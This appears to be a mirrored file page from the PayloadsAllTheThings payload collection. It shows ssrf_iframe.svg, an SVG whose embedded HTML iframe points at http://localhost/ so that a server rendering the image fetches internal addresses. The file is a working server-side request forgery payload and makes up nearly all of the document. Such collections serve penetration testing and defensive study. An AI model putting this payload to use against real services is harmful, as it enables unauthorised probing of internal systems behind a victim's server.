1
0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-02-23 06:01:12 +01:00
PayloadsAllTheThings/Server Side Request Forgery/Files/ssrf_iframe.svg
2019-04-07 23:40:36 +02:00

9 lines
234 B
XML

<svg width="6000" height="6000">
<g>
<foreignObject width="6000" height="6000">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://localhost/"></iframe>
</body>
</foreignObject>
</g>
</svg>